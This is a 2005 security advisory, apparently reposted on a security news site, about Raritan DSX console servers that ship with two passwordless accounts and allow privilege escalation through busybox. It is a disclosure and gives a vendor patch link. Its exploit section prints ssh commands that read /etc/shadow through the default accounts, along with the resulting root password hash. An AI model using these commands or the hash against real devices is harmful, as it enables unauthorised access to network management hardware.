Ads Raritan Console Servers Access Privileges Escalation and Default Login Monday, 04 July 2005 Two vulnerabilities were discovered in Raritans console server solutions. Vulnerable Systems: * DSX16, DSX32, DSX4, DSX8, DSXA-48 (Mips and Intel) DSX Raritan Console Servers come with two accounts that do not have a password. Normal users are not supposed to get access to the underlying Linux, but they can use the busybox environment to gain elevated privileges. Further the password used to protect the root password can be cracked by utilizing brute forcing techniques. Patch Availability: After reporting it to Raritan has released a fix: http://www.raritan.com/support/sup_upgrades.aspx Exploit: %ssh dominion@ ls -l / [..shows listing..] %ssh dominion@ ls -ln /etc/shadow -rw-r--r-- 1 0 0 360 Jun 28 05:09 /etc/shadow %ssh dominion@ cat /etc/shadow root:DX8k7w4C2gJ2g:10933:0:99999:7::: bin:*:10933:0:99999:7::: daemon:*:10933:0:99999:7::: adm:*:10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody:*:10933:0:99999:7::: dominion::12962:0:99999:7::: sshd::12962:0:99999:7::: %ssh dominion@ cat /etc/passwd | tail -2 dominion:x:500:500:Embedix User,,,:/home/dominion:/bin/sh sshd:x:501:501:Embedix User,,,:/home/sshd:/bin/sh %ssh sshd@ ls indexApp.htm %ssh sshd@ ls -l /bin/busybox -rwxrwxrwx 1 root root 193852 Apr 4 2004 /bin/busybox The information has been provided by Dr. Dirk Wetter.   < Prev   Next > [ Back ]

Main Menu SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus Windows Focus VNews Vulnerability Hacking Sql Injection map Downloads Affiliates Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder

Copyright 2005-2007 SpamAlertz.com, Content on this site is From variuos other emails, and Advisories.